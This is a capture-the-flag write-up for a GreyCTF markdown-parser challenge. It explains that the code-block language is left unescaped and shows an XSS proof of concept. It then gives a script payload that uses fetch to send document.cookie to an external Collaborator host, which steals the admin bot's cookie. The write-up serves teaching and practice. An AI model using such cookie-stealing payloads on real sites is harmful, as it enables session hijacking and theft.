Challenge Description

I built this simple markdown parser. Please give me some feedback (in markdown), I promise to read them all. Current features include: bold, italics, code blocks with syntax highlighting!

Author: ocean

http://challs.nusgreyhats.org:33335

https://storage.googleapis.com/greyctf-challs/dist-markdown-parser.zip

Code Analysis

Looking at the site, it seems to be relatively straight forward, just a markdown parser.

Markdown parser is known to be vulnerable to XSS without proper sanitization and escaping, as it reflects your input, as shown below.

Looking at the code where they parses the markdown.

We can see that they check if its a codeblock as indicated by ```

If its a code block, it will append the language onto the htmlOutput. Note that they also attempt to perform sanitization through the escapeHtml function if it is not in a code block.

The function replaced ampersand, greater than, lower than, double quotes, and single quotes with their respective HTML entity codes. However, in line 18, we noticed that the language was appended onto the htmlOutput without any escaping.

After parsing the markdown, we can then submit the Markdown to the admin bot at /feedback endpoint. Now that we have dissected the application, we are able to attempt to exploit the potential cross site scripting that was identified.

Exploit

Firstly, we used <script>alert(document.domain)</script> as a proof of concept that we are able to perform XSS.

```"> <script>alert(document.domain)</script>

We are able to get the XSS working.

So lets modify our payload to try and steal the admin cookie.

```"> <script>fetch('http://d9nzvl3vlaa0mvl0ixdml5g4zv5otjh8.oastify.com', {method: 'POST', mode: 'no-cors', body:document.cookie }); </script>

I used BurpSuite collaborator to receive the request, and BurpSuite repeater the send it.

After waiting for a bit, I managed to receive the request to collaborator, and able to retrieve the flag successfully.

Flag: grey{m4rkd0wn_th1s_fl4g}